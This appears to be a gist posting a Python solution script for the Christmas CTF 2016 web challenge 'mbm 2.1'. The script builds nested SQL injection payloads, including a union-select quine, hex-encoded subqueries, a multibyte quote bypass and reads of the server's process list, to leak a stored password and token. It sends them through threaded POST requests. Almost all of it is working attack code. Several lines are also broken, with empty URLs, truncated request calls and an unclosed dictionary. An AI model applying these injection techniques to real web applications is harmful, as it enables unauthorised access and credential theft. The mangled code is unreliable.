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Jinmo/ Secret

Created December 25, 2016 06:06
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Christmas CTF 2016 mbm 2.1
# modified from
how to use
1) python 1
2) python 5
3) look at the " 1" instance
import urllib2
import urllib
import sys
import random
import time
import requests
import threading
import struct
# exploit
resource = lambda x: '(select uncompress(unhex(substring_index(substring_index(info, 0x' + (x + ':').encode('hex') + ', -1), 0x21, 1))) from information_schema.processlist where instr(info, 0x' + (x + ':').encode('hex') + '))'
#pw, token
x= ("' union select %s,%s#" % (resource('upw'), resource('rtoken')))
a= "' union select %s,%s,0x%s#" % (resource('r2id'), resource('upw'), x.encode('hex'))
b= ("' union select 0x" + a.encode('hex') + ", REPLACE(REPLACE(REPLACE('\\\' union select 0x" + a.encode('hex') + ", REPLACE(REPLACE(REPLACE(\"$\",CHAR(34),CHAR(39)),CHAR(36),\"$\"),CONCAT(CHAR(39),CHAR(39)),CONCAT(CHAR(39),CHAR(92),CHAR(39))) AS Quine#',CHAR(34),CHAR(39)),CHAR(36),'\\\' union select 0x" + a.encode('hex') + ", REPLACE(REPLACE(REPLACE(\"$\",CHAR(34),CHAR(39)),CHAR(36),\"$\"),CONCAT(CHAR(39),CHAR(39)),CONCAT(CHAR(39),CHAR(92),CHAR(39))) AS Quine#'),CONCAT(CHAR(39),CHAR(39)),CONCAT(CHAR(39),CHAR(92),CHAR(39))) AS Quine#")
print b
c= (" union select 0x61646d696e,%s,0x" % resource('upw') + b.encode('hex') + "#")
d= '\x0A' + c
payload = {
'uid': '\xBF\x27\x0A\x23',
'upw': d
#print d
compress = lambda x: struct.pack("<L", len(x)) + x.encode('zlib')
print compress('aa').encode('hex')
register = lambda x, y: '#' + x + ':' + compress(y).encode('hex') + "!"
ress = [register("r2id", a), register("rtoken", b), register("upw", d)]
resource = "\n union select sleep(2),1,1#reshack"
url = ""
# url = ""
def resourcehacker(r):
global url, resource
payload = {
'uid': '\xBF\x27\x0A\x23',
'upw': resource + r
r =, data=payload)
# print `r.text`
for res in ress:
reshack = threading.Thread(target=resourcehacker, args=(res, ))
temp = ""
#request_packet = urllib2.Request("", payload)
r =, data=payload)
request_data = r.text
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